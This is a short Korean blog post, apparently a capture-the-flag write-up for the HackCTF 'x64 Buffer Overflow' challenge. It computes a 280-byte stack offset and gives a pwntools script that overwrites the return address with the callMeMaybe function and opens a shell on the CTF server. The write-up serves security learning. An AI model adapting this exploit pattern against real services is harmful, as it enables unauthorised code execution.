[HackCTF] x64 Buffer Overflow

2021. 5. 16. 01:48·Write-Up/HackCTF
반응형

이전까지는 32bit였지만 64bit로 바뀌었다.

callMeMaybe함수

 

scanf통해서 bof발생후 ret주소 callmeMaybe로 해주기

s = rbp-110h = 272

callmemaybe 주소

from pwn import *

p = remote('ctf.j0n9hyun.xyz', 3004)
pay = b'A'*280
pay += p64(0x0000000000400606)
p.sendline(pay)
p.interactive()

 

 

반응형

'Write-Up > HackCTF' 카테고리의 다른 글

[HackCTF] Simple_Overflow_ver_2  (0) 2021.05.16
[HackCTF] x64 Simple_size_BOF  (0) 2021.05.16
[HackCTF] 내 버퍼가 흘러넘친다!!!  (0) 2021.05.15
[HackCTF] Basic_FSB  (0) 2021.05.15
[HackCTF] Basic_BOF #2  (0) 2021.05.15
'Write-Up/HackCTF' 카테고리의 다른 글
  • [HackCTF] Simple_Overflow_ver_2
  • [HackCTF] x64 Simple_size_BOF
  • [HackCTF] 내 버퍼가 흘러넘친다!!!
  • [HackCTF] Basic_FSB
Penguin Dev
Penguin Dev
What does the Penguin say?
    글쓰기 관리
  • Penguin Dev
    Pengha!
    Penguin Dev
  • 전체
    오늘
    어제
    • 분류 전체보기 (152)
      • Java & Spring (5)
      • System Hacking (4)
      • Algorithm (8)
        • Sorting algorithm (3)
      • Python (6)
      • Web (2)
        • Web Hacking & Security (2)
      • Write-Up (108)
        • pwnable.kr (17)
        • HackCTF (16)
        • 해커스쿨 FTZ (21)
        • LOB(lord of bufferoverflow) (19)
        • LOS (lord of sql injection) (28)
        • XSS-game (6)
        • Webhacking.kr (1)
      • SUA (19)
        • 오픈소스 보안 (19)
  • 블로그 메뉴

    • 홈
    • 태그
    • 방명록
  • 링크

  • 공지사항

  • 인기 글

  • 태그

    reentrantlock실습
    ConcurrentHashMap
    nop sled
    hashmap vs concurrenthashmap
    Lock
    spring boot
    lord of bufferoverflow
    computeifpresent()
    concurrenthashmap vs hashmap
    AQS
    DB정리
    ReentrantLock
    코드트리조별과제
    spring
    CountDownLatch
    코드트리
    sqlinjection
    tabat
    computeifpresent
    Java
    thread-safe
    SpringBoot
    putval()
    쿠폰발급
    computeifabsent
    동시성처리
    enumerate #list comprehension
    computeifabsent()
    동시성
    LOB
  • 최근 댓글

  • 반응형
  • hELLO· Designed By정상우.v4.10.3
Penguin Dev
[HackCTF] x64 Buffer Overflow
상단으로

티스토리툴바